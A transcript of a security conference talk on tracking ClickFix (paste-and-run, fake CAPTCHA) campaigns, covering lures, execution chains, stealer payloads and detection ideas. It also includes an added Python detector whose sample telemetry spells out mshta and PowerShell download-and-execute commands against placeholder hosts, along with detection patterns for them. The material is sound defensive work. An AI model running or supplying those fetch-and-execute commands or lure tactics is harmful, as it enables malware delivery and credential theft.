
Hey y'all. All right, it's going to take me some time to get the mic dialed in. Is this a good distance from the face? Yay. All right, thank you guys in the back. I appreciate it. So, I hope everybody's having a good day so far. Do we have a good morning? Yeah. Yay. Good. I'm delighted to be here with you today. Welcome to "Copy That: Tracking and Clustering ClickFix Campaigns." I already had a wonderful intro from Patrick. I'll share a couple more little details. I am a senior intel analyst at Red Canary. Been there for a little over three years, about three and a half. Before that I was a DFIR consultant at the Indian, which was great fun. Before that I was here, at the School of Computer and Cyber Sciences, class of 2019. Go Jags. So, for those of y'all who are also in the SCCS, I hope you're enjoying it as much as I did. It's a fantastic program. And BSides was actually my first conference. When I was still in school here, I volunteered. And I know I'm seeing the screen do that, too. So, let's see if we can figure out, wiggle it a little bit. There we go. Nope. Still, it looks... We'll see if it gets to be too onerous. We'll see if we can find another way to make the computers work well together. And current favorite hobby, jigsaw puzzles. I find them very relaxing. It's another way of kind of using my brain but also turning my brain off.

So, let's get into it. All right. So, today we're going to talk about paste and run. I'm going to start off talking a little bit about what that is. Then I'm going to share the struggle of some of the things that the intel team had to think about as we were trying to cluster and track it over the past year. I'll share some lessons learned and some detection opportunities, and then we will wrap up and I'll answer questions. All right. So what is paste and run? The base explanation is it's an initial access technique that tricks users into copying, pasting, and executing malicious PowerShell code. Who here has heard of paste and run or ClickFix or fake CAPTCHA in the last year? Oh wow. Okay, we're all enjoying the past year and a half, aren't we? That's a lot more than I thought there would be. And so, as y'all know, like we said, there are these different names. The names reflect the two kinds of lures that paste and run uses. The reason why we use "paste and run" at Red Canary is early on we started seeing the fake CAPTCHA lure as it was moving away from the fix, and we started calling it this because it was kind of lure agnostic. So if you've ever wondered why we're sticking to paste and run, that's why, but it's the same thing. All right. So, there are... Thank you all for troubleshooting connections and things. Nope. Still doing... that's all right. I think it's a little better. Anyway, so there are two main kinds of lures. So, the user has to fix their access to a document or website access, or do a software installation, and they fix things by following the instructions in the prompt. The second kind of lure is a CAPTCHA style lure. Again, the user has to access a website or a download. And they do that by proving they're a human by following the instructions in the prompt.

So, here's an example of one of the OG ClearFake ClickFix lures. So, can anybody tell me, and this is for a giveaway, this is for the wide range wireless USB-C adapter, can anybody tell me what month and year Proofpoint first reported this being used by TA571 and by ClearFake? Yes, green shirt. >> Yours. Well done. So, yes, in March 2024, Proofpoint reported that this was being used by, again, TA571 and by ClearFake to pretty good effect. So, as you can see, the prompt is that, oh, we have a trouble, we have an issue, you need to copy this, open PowerShell admin, you know, right click in the terminal window and then refresh the page after the update is complete. This was very effective. This was so effective that there started to be some variations on the theme. And this is actually the kind of lure that has really taken off. So this fake CAPTCHA style lure, wildly popular, wildly successful. And this is one that I pulled from clickfixcarsonw.com, which is a great resource for domains and checking out what the lures look like. A lot of them are mimicking Cloudflare verification pages. And the idea is that you click to verify that you're human. That's the first step in this malicious process. And then you follow the prompts. You press some keys.
So what's actually happening as you are doing those things? First of all, the user interacts with the lure. That's that click to verify that you're human. What that does is it copies an obfuscated PowerShell command to the user's clipboard without the user knowing, most of the time. Sometimes it's more overt, like it was in the ClickFix lures. I've also seen paste and run use fake CAPTCHA lures that just say "copy this command." But usually the user doesn't know. Then for the Windows version, particularly the fake CAPTCHA version, the user's prompted to press the Windows key and R. Some of them use Windows and X as well. Both of those are shortcuts to open up the Windows run dialogue. The next step is Ctrl+V to paste. That pastes the previously, unknowingly copied command into the Windows run dialogue. You press Enter; that executes the command. The command reaches out to the next stage. Paste and run has successfully done its shenanigans. So, this hasn't done anything evil yet, but this is an initial execution technique, right? This is what they're using to set up their next stages, or their next actions in their behavioral activity chain.

So, what happens next? Here's an example of what the run dialogue command looks like. This is the kind of thing that gets copied to the clipboard. And sometimes it'll be this overt that it is a fake CAPTCHA style. Sometimes it's a little more subtle. But there'll be some kind of command copied into the run dialogue window, again for the fake CAPTCHA version. This example specifically uses mshta to pull down the resource in the command that goes on to execute a PowerShell command that's obfuscated. The example I'm going to show you used Base64 and concatenation. It looks like this. And then after that, the script pulls down the next stage payload. No, no, no. I thank you for troubleshooting. I appreciate it. Did that do it? >> Nothing happened. Everything... Nothing. It's all the same. Nothing changed. So, the script pulls down the next stage payload. And in this example, the payload would have been Rhadamanthys. So for, and this is very apt, an Evading EDR book: who can tell me what kind of malware family Rhadamanthys would fall into? Yes. Yes. It's okay if it's on the screen. I'm not mad about it if y'all are reading ahead of me. All right. So Rhadamanthys, yes, is an information stealer, and stealers are very popular choices of malware for these follow-on payloads. I think stealers and remote access tools, and then also additional downloaders. So like HijackLoader, or GHOSTPULSE, is another really common follow-on payload, because it gives them a lot of options for what they can do with the access that they have.

Like any successful technique, the scope of targeted systems has expanded since it first appeared on the scene. This is the Linux variant. So you receive the prompt, usually in a browser window, to again prove that you're not a robot. And you have to verify you're human by pressing Alt+F2, Ctrl+V, and Enter. And for our last giveaway, for a Practical Linux Forensics book, who can tell me, just in base terms, what does Alt+F2 do on a Linux system? Yes, it does. It opens up the run command. Thank you. Congratulations. All right. Oh, I left my pointer over here. Okay, so that is the Linux variant. This is also effective.
And there's a macOS variant. We have not seen the Linux variant at Red Canary. We have seen the macOS variant used to great success to deliver Atomic Stealer and other stealers in the AMOS family, so like Poseidon, Odyssey, and so forth. And this looks a little more involved, but y'all that are Mac users, you know this looks like a Homebrew command, right? So if you're doing installations at all, you see this, it's going to be like, "Oh yeah, okay. We're going to do the installation for this thing in Homebrew." More like Homebrew instead of a click to download. This is fine. Everything's fine. Works a treat.

There have also been expansions on the kinds of places, or the places on the systems, where this technique or similar social engineering can be used. There's a variant called FileFix, and that has the user run the command in the Windows File Explorer. So as you can see, they're prompted to copy a file path, and that is actually what pulls down the script or the payload. Again, very effective. This is actually a really popular variant that's in use by KongTuke, which is a malicious traffic distribution system. They've been using this variant of the technique quite a bit this year.

How is it distributed? It's distributed any way you can distribute phishing emails. I think this is one of the reasons why it's so effective. It's because users are kind of bombarded on all sides by different places that they're encountering the lures. So phishing emails, like I said, malvertising, website injects, malicious links like shared in Discord, I know, is one vector that was used, and lots more. I wanted to include some additional examples of what this can look like. So this is what one of the phishes might look like. You click in to review feedback after a recent Booking.com stay, and then it has you verify that you are a person after you follow the link in the phishing email.

Why is this so effective? Why? It's because it takes advantage of human factors, right? So, as Patrick mentioned, I have an MS in psych. I like thinking about the human factor side of things. The biggest reason why this is effective is that CAPTCHAs are not perceived as a threat, right? CAPTCHAs are a thing that we have been kind of trained to do. We're habituated to them. I'm not going to say users, because we are also habituated to them. And completing them is routine. And the fact that completing them is routine is really what makes this so effective. Because when humans have routine tasks, we don't think as hard about completing them. We do them more automatically. We don't look at them as critically. And that means in some cases we're more likely to just kind of follow along with behavior that we're used to doing. Also there's some urgency to fix the issues that you're having to complete your work, and also people tend to follow instructions from trusted sources. These are designed to mimic Cloudflare verification or, you know, Windows popups, and to an average user it's going to look like something that they should follow along with. I saw this one last night. So, I know it's like a potato fuzzy copy, but this is a browser popup mimicking a Windows Update screen that uses paste and run to get them to complete the security update. This is sinister. I can think of a lot of people who wouldn't think too hard about this.
It's the worst. So, sharing the struggle. I wanted to talk a little bit about thinking about this from a threat intelligence perspective, because that's one of the fun things about the work that we do: people that work on different teams look at threats in different ways. And this was really interesting to try and figure out how to track from an endpoint perspective. And there's different ways that you can think about it, right? There's different boxes that you can put this behavior into. And so, I'm going to talk a little bit about each of these in some more detail.

The first one is groups and adversaries, right? You can track who is using paste and run in their campaigns. And initially, especially early on, that's what we were doing, because this was reported by Proofpoint as being used by a very specific couple of adversaries, by TA571 and by ClearFake. So, we started tracking it that way. At first, the technique was really rapidly adopted by a very wide number of adversaries. So, that wasn't going to work in the long term. And for those of y'all who don't know as much about Red Canary, we are an MDR, managed detection and response, endpoint detection and response team. We have expanded a little bit into some phishing offerings and identity, but we're really endpoint people. So for us, we would really have to lean on OSINT to be able to make these associations, because we just don't have visibility. We see what happens on the endpoints. And that's why it's great that teams like Proofpoint share their research, because they do have better visibility into the campaigns.

We can track the infrastructure. So we can track where the lures and the payloads are hosted. And this is nice because it's a little more adversary agnostic. It doesn't matter as much who's adopted the technique. And we can also use concrete IOCs. We've got IP addresses. We've got domains. But again, from an endpoint perspective, this can change very quickly. All they've got to do is put a new IP address or a new domain in the script or in the command, and poof, there goes our cluster. So these kinds of clusters might last for a week, a day, depending upon the campaign that's being operated. So for our purposes, they're a little brittle.

We can track the payloads and follow-on threats. And from an endpoint perspective, this is great. We do this. We can determine this much more easily from where we sit. We see the activity on the systems. We can put stuff into a sandbox. We can actually figure out what malware is executing. And it's much less dependent on OSINT for us. However, there are so many payloads. So many payloads. At this point, we've easily seen two dozen different threats delivered or using paste and run. That's a lot. That's a lot to keep track of. What do we do with it if the payloads are undetermined? What if the payloads aren't delivered? We track it as precursor activity in that case, but still, this is also not ideal.

And then Red Canary clusters. So we can look at what we're seeing. We can combine IOCs and behavior. We can create our clusters. And this is great because we can track it based on what we see. We can be super accurate, and we can discover new uses and unique malware. So our cluster that became Mocha Manakin kind of came out of this initiative, and they used a custom-made tool called NodeInitRAT. And so we were able to figure that out with our clusters. However, as I have mentioned, this changes really rapidly. So, you start getting into like infinite clusters of potential activity depending upon how you want to categorize it.

So, how did we actually track this activity at Red Canary? All the things. We did all of the above and a little more. So, especially at first, we were associating to adversaries and groups, and we still do. Like I said, we've been tracking KongTuke using FileFix. And so when it's available via OSINT or we can kind of hunt up that association, then we definitely do track it that way. We track the infrastructure and the domains and IPs. We track the payloads it's dropping. We have our internal clusters. And then the thing that we started doing once we realized we had all of these really sort of disparate and different kinds of tracking methodologies is we created an internal tag in Synapse for the technique. So Synapse, it's Vertex Synapse, is a tool that you can use as a threat intelligence analyst to kind of cluster, organize, look at your data. If you're familiar with Nucleus, this is the commercial version of Nucleus. And so we started doing that, which was very helpful. Tracking it in all of these different ways means, like I said, it's well tracked. It's very accurately tracked. It's really hard to aggregate, right? It's doable. We have done it, but it's harder to do across time. And we're a small team. There's eight people on the Red Canary intel team. So anything that saves us time is a good thing.
So earlier this year the MITRE team created a new sub-technique for User Execution: Malicious Copy and Paste, which is very exciting. This is paste and run. So we have a lot of tools in our platform; we have a lot of ATT&CK technique integrations. When this came out, I was like, because I'm like Marie Kondo, it sparks joy for me to organize information into very easy-to-look-at ways. So, I was like, this is a great opportunity to go back and take a look at everything that we've seen. I did that, and I won't go into too much detail about how we did this in Synapse, but again, we created a tag to kind of supplant or go along with our internal tag. We added some additional Vertex connections between the different data points, and that makes it easier to find things, easier to pivot, easier to monitor trends over time, which is what we want to do as intel analysts.

All right. So, now I'm going to get into some lessons learned, and I'm gonna share some findings and some detection opportunities. This is what it looked like before. These are actual charts I pulled out of Synapse. Some of them, like one of them is our internal tag. One of them is like payloads, clusters, we had command lines, and afterwards we had one data set, one beautiful data set. When you have one beautiful data set that's easy to query, you can ask and answer questions so much more easily. I know that you all already know this, but it's so satisfying to be able to take all of the data and make it useful. That's kind of what we're trying to do as intel analysts. So like I said, we can easily answer questions like, what threats have we seen with paste and run across time? And the top five paste and run payloads that we've seen across time are LummaC2, which is a stealer; NetSupport Manager, which is a remote access tool; HijackLoader, which is a dropper and downloader that can pull down more payloads; Latrodectus, another stealer; and Rhadamanthys, another stealer. So again, stealers are very popular payload choices. I wanted to also include some information that was a little bit more current, like post-LummaC2 takedown. If y'all will recall, there was a major infrastructure takedown earlier this year in May to remove LummaC2 infrastructure. It has returned since then. So even in the last three months, it was still the second most commonly seen threat alongside paste and run. And again, it's very similar, just things in slightly different order, but it's so nice to just be able to go in and answer this question in mere moments compared to what we could do before.

And this is another really fun one, looking at how the execution has changed over time. This is a little in-the-weedsy, so I won't go into deep, deep details about this. I will say a couple of things I want to point out: paste and run very commonly uses mshta, and it uses PowerShell with Invoke-Expression in the scripts quite often. I'll actually circle back to that in a little bit. And they moved away from it this summer; they were using some different types of execution. They've returned to it now. They're also using msiexec, so we're starting to see that more and more in the last month and a half or so. And we're also starting to see these PowerShell commands that use the .NET class System.Net.WebRequest with GetResponse included as well, which is kind of interesting.

So, lessons learned. I think for us, the biggest lesson is we'll lean harder into those internal technique tags even sooner. We did do that, but it would not have hurt anything if we had just done that up front, been like, "This is a technique. We're starting to see it in multiple environments. Let's make sure that we are organizing it in a way that makes it easy to see across environments and across time," because then if the good folks at MITRE do create an official technique for that TTP, then we will already have everything aggregated and we can just put their tag on top of our tag. So, I think this is something that we're going to start doing a lot more aggressively, is just going ahead and being like, "Okay, we're gonna call it this just so we can see all of it all at once."

Here are some observables for those of y'all who are endpoint and detection minded. You're going to see explorer.exe spawning processes to execute that initial command. It might be mshta, like I said, it might be msiexec. It might be PowerShell, or cmd.exe as well, but you're going to see something spawning and reaching out to those remote resources, which means you're also going to see suspicious outbound network connections. Not just early on; you'll see this early on, but you'll also see this all the way through paste and run execution as different stages get downloaded and then reach back out for C2 or to pull down additional resources. And this is another one that I want to point out. You're going to get a registry key change unless the prompt uses Windows and X. Windows and X does not create a RunMRU registry key for Windows run dialogue use, but that's less common than Windows and R. So if you are seeing especially these things together, this is sus. This is very suspicious. This is suspicious enough that, especially for us, these are kind of the hallmarks of what we look for for early paste and run execution.
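As an added example, not code from the talk or from Red Canary, here is a small Python correlation routine that applies the observables just described to some constructed endpoint telemetry: explorer.exe spawning mshta, msiexec, PowerShell or cmd.exe with a remote resource on the command line, PowerShell feeding downloaded content to Invoke-Expression (or using System.Net.WebRequest with GetResponse), the outbound connection that follows, and the RunMRU registry write that Windows+R leaves behind and Windows+X does not. The event schema, process IDs, timestamps, logon IDs and hosts are assumptions made for the example and stand in for whatever an EDR sensor actually emits.

```python
"""Toy behavioural detector for the paste-and-run hallmarks described in the talk.
Added example: not Red Canary's detection logic. The event dicts below are an
assumed, simplified schema, not any EDR's real format."""
import re

# Processes the talk names as the initial executor spawned from explorer.exe
INTERPRETERS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "msiexec.exe"}

REMOTE_RE = re.compile(r"https?://|\\\\[\w.-]+\\", re.IGNORECASE)   # URL or UNC path
IEX_RE = re.compile(r"\biex\b|invoke-expression", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|invoke-restmethod|"
    r"\biwr\b|\birm\b|net\.webrequest|getresponse", re.IGNORECASE)
RUNMRU_RE = re.compile(r"\\Explorer\\RunMRU\\", re.IGNORECASE)


def hallmarks_for(proc, net_pids, runmru_writes, window=60):
    """Return the list of paste-and-run hallmarks one process event matches."""
    image = proc["image"].lower()
    parent = proc["parent_image"].lower()
    cmd = proc["cmdline"]
    found = []
    if parent == "explorer.exe" and image in INTERPRETERS:
        found.append("explorer_spawns_interpreter")
        if REMOTE_RE.search(cmd):
            found.append("remote_resource_in_cmdline")
        # Win+R writes RunMRU in the same logon session just before the spawn;
        # Win+X does not, so this hallmark corroborates and is never required.
        if any(w["logon_id"] == proc["logon_id"] and 0 <= proc["ts"] - w["ts"] <= window
               for w in runmru_writes):
            found.append("runmru_write")
    if image in {"powershell.exe", "pwsh.exe"} and IEX_RE.search(cmd) and DOWNLOAD_RE.search(cmd):
        found.append("powershell_iex_download")
    if proc["pid"] in net_pids:   # mshta and run-dialogue children rarely need the network
        found.append("outbound_connection")
    return found


def detect_paste_and_run(events, min_hallmarks=2):
    """Correlate process, network and registry events and report every process
    that shows at least min_hallmarks of the behaviours above, in start order."""
    net_pids = {e["pid"] for e in events if e["type"] == "network"}
    runmru_writes = [e for e in events
                     if e["type"] == "registry" and RUNMRU_RE.search(e["key"])]
    findings = []
    for p in sorted((e for e in events if e["type"] == "process"), key=lambda e: e["ts"]):
        marks = hallmarks_for(p, net_pids, runmru_writes)
        if len(marks) >= min_hallmarks:
            findings.append({"pid": p["pid"], "image": p["image"], "hallmarks": marks})
    return findings


# Constructed sample telemetry (timestamps in seconds, placeholder hosts and IDs).
SAMPLE_EVENTS = [
    # User presses Win+R, pastes, hits Enter: RunMRU write, then explorer spawns mshta
    {"type": "registry", "ts": 100, "logon_id": "0x3e7a1",
     "key": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a"},
    {"type": "process", "ts": 101, "pid": 4102, "logon_id": "0x3e7a1",
     "parent_image": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta http://captcha.example.invalid/verify"},
    {"type": "network", "ts": 102, "pid": 4102, "dest": "203.0.113.10:443"},
    # Content mshta fetched runs PowerShell that downloads the next stage into Invoke-Expression
    {"type": "process", "ts": 103, "pid": 4300, "logon_id": "0x3e7a1",
     "parent_image": "mshta.exe", "image": "powershell.exe",
     "cmdline": "powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://cdn.example.invalid/s')\""},
    {"type": "network", "ts": 104, "pid": 4300, "dest": "203.0.113.11:443"},
    # An admin opening PowerShell from the Start menu to list files: one hallmark only
    {"type": "process", "ts": 500, "pid": 4200, "logon_id": "0x3e7a1",
     "parent_image": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoProfile Get-ChildItem C:\\Users"},
    # An ordinary double-click on a text file: no hallmarks
    {"type": "process", "ts": 600, "pid": 4500, "logon_id": "0x3e7a1",
     "parent_image": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad notes.txt"},
]

if __name__ == "__main__":
    for f in detect_paste_and_run(SAMPLE_EVENTS):
        print(f["pid"], f["image"], ", ".join(f["hallmarks"]))
```

With the default threshold of two hallmarks, the mshta spawned from explorer.exe with a URL, a RunMRU write and an outbound connection is reported, as is the PowerShell child that pulls content into Invoke-Expression and then talks out; the admin who merely opened PowerShell from the Start menu is not, and would only surface if the threshold were lowered to one. The RunMRU check is deliberately a corroborating signal rather than a gate, which is what the Windows+X caveat above requires.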
Detection opportunities. So as I mentioned, PowerShell using Invoke-Expression to download additional content. This has been a great way of detecting paste and run from the beginning. And this is still very effective. And this not only works for paste and run; this is useful for other adversaries that like to use PowerShell scripting to pull down additional resources. And as you've seen a couple of times, mshta reaching out and making external network connections: generally, it ought not to do that. And so this is a good thing to kind of baseline in your environment. If you do see it doing this, it's worth taking a closer look at.

I want to offer a couple of mitigation suggestions as well. So, user education. I know that's a little tricky, because user education is something that we all know is always, you know, iterative. It's a process. But making sure that users know that there should never be a reason for them to be pressing keys as a part of a verification process. That's just not okay. Legit CAPTCHAs will never have you doing keyboard actions, as far as I know. If I'm wrong about that, please feel free to correct me, but I've never seen a legit CAPTCHA that uses any kind of keyboard actions at all. You can disallow access to the Windows run dialogue, or you could disable Windows hotkeys. I know depending upon your users and your environment, that might be a little tricky, because some people really love to use these things, but something to consider. This last one's a little spicier. You could disable cmd.exe and PowerShell execution for standard users. I know that might be a lot, and it might be hard to implement, but it's something to think about. If this is the kind of thing you're able to do with group policies, then the bad things don't run, which is really nice. So again, I'd like to just throw this out there as this would mitigate it and a lot of other things. Something to think about.

So, what are your key takeaways? What have we talked about today? We've talked about paste and run, aka ClickFix, fake CAPTCHA, and how it's a very popular and effective initial access technique that is in use right now. There are a variety of different ways to track this activity from an intel perspective, which made it a little challenging to decide how to track it early on. But we were able to leverage different technique tags to be able to aggregate that data set and gain more insights from our data more easily. And then I shared some findings and detection opportunities based on what we've seen at Red Canary. And that is all of the content that I have for you today. And now I would be very happy to answer any questions that y'all have. All right, I'm gonna start here and then work my way up.

>> So, the question is, what about blocking clipboard access? I think that would work. I'm not as familiar with the kinds of policies that you'd have to use and how that might affect different user experiences. But if you're able to, I don't see any reason why that wouldn't potentially be helpful, because it is that specific Ctrl+V. There might be other ways that they could still copy and paste things that wouldn't be affected.
>> Yes. Yeah. So the comment is that the actual evil, the shenanigans, are happening when they pull it in. So if you can keep it off the clipboard, it won't get pulled in and executed. So yeah, that could work. >> All right.
>> Oh, interesting. So the question is, can we use additional software, like DBS software, to see what's copied into things? We have not, but that's partly because of where we sit at Red Canary, right? So where we sit on the endpoint is we sit kind of on the other side of, like, Microsoft, SentinelOne, and we see what's happening on the systems. But from an enterprise perspective, I do feel like that's something that you could use in your local environments to take a look at things when you're doing investigations. And we can, like, go into sensors; our threat hunters can do things like that, but because of the scale, we tend not to do that. If we can detect it behaviorally, that's much faster for us to do at scale. Yes. All right.
>> All right. So the question is, this gentleman, they do disable PowerShell in Neil's environments for standard users, but have we seen any other kind of additional execution, like Visual Basic script and things like that? Not as often. I don't think we've seen this technique use VBS files, but I feel like adversaries love to cycle between scripts, right? So if something works really well as PowerShell, it's not at all uncommon; for now they're using MSI. It would not surprise me if we start seeing more JavaScript or more VBS as people get better at defending against the PowerShell execution, because they just love to iterate through the scripts. Yes.
Mhm.
>> ...this kind of activity. So the question is, what false positives have we seen behaviorally? Since we do a lot of behavioral detections, and for this activity, not a lot. Not a lot, especially if you get beyond that first execution. Again, like I said, for things like mshta to reach out and pull down resources, that's very telling. And so especially because now we have behavioral detection opportunities for that initial execution, we haven't had a lot of false positives, which is one of the nice things about it. I guess it is high volume. It's not especially quiet, and if you're looking for some of the things that I've mentioned, hopefully it will be a little loud, which is always nice. Any other questions? Oh yes. There's no such thing.
That's a great question. It's not a stupid question. So, the question is, at Red Canary, since we do this kind of work, would we be producers or consumers of threat intelligence? The answer is both, because like a lot of threat intelligence teams, we have a lot of different customers, so to speak. We have our customers who we're working for, who we're producing intelligence for, but we also have our internal teams that are leveraging the things that we find and feeding it back into our detection engine, and are using the things that we find to make our work at Red Canary better. And we also read everybody else's reports too. Like I said, Proofpoint, you know, as much OSINT as we can read about these things, we try to take a look at. The next slide is all my references. So yes, I absolutely consume a fair bit of intelligence as part of my work as an analyst. I saw another hand. Yes.
>> Uh-huh.
So the question is, with Windows and R and the Windows run dialogue pops up, how do the users not see that pop up? I think what usually happens is it's behind the browser screen or whatever it is that they're interacting with. And so I think that instead of it popping up and then seeing it and seeing that happen, I think that they're keeping it visually not at the front of the series of windows. So yeah, I don't think they see it when it's happening. >> Yes.
Uh-huh.
>> Oh, okay. >> Oh. Oh, that's terrible. >> Okay, I appreciate that. Thank you. Because that's the kind of thing that we don't see as well from where we sit. So, they've actually seen this executed on systems, and what they have seen is that the Windows run dialogue actually does pop up and is visible to the users, but part of the string is the "I verify that I'm human." So they see that, and they're like, "Oh, good. I'm doing the thing I'm supposed to be doing. I'm verifying that I'm human." And the additional code that's pulling down remote resources is not visible to them in the run dialogue window. So they do see it happening, at least in some cases, but it looks like they're doing what they're supposed to do, because they're doing what the prompt told them. Gosh, clever. Clever girl. It's terrible. Any other questions or insights from some of y'all? Because like I said, how many of y'all have seen this activity or have heard about it? Yes.
Okay.
>> Oh, yeah.
>> Okay. All right. >> Okay. So this gentleman was saying that at their environment they had somebody who, it sounds like maybe there's some social engineering that happened with the prompts, and VBS files were leveraged for the evil that was done. And adversaries do, they love all of the scripting languages, or the different scripting options, so much, and they love to kind of rotate between their current favorites. Thank you for sharing. Anybody else? It's been an absolute pleasure. Thank you all so much. I hope you have a wonderful rest of your day.